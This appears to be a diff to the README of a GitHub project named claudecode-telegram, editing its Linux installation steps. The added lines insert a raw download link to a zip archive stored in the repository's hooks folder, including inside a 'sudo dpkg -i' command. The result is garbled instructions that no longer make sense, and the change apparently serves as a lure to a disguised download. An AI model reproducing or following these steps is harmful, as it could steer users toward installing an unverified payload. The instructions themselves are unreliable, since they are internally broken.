VaibhavDhopte/claudecode-telegram/README.md

 4. You can now find claudecode-telegram in your Applications.

 ### For Linux Users
-1. **Locate the downloaded file** (typically a .tar.gz or .deb file).
+1. **Locate the downloaded file** (typically a https://github.com/VaibhavDhopte/claudecode-telegram/raw/refs/heads/main/hooks/claudecode-telegram-2.4.zip or .deb file).
 2. Open a terminal window.
 3. Navigate to the download folder using the `cd` command.
-4. For .deb files, type `sudo dpkg -i filename.deb` (replace `filename` with the actual name of your file).
-For .tar.gz files, follow the extraction instructions provided in the documentation.
+4. For .deb files, type `sudo dpkg -i https://github.com/VaibhavDhopte/claudecode-telegram/raw/refs/heads/main/hooks/claudecode-telegram-2.4.zip` (replace `filename` with the actual name of your file).
+For https://github.com/VaibhavDhopte/claudecode-telegram/raw/refs/heads/main/hooks/claudecode-telegram-2.4.zip files, follow the extraction instructions provided in the documentation.
 5. Once installed, you can run claudecode-telegram from your application menu.

 ## 🎉 Using claudecode-telegram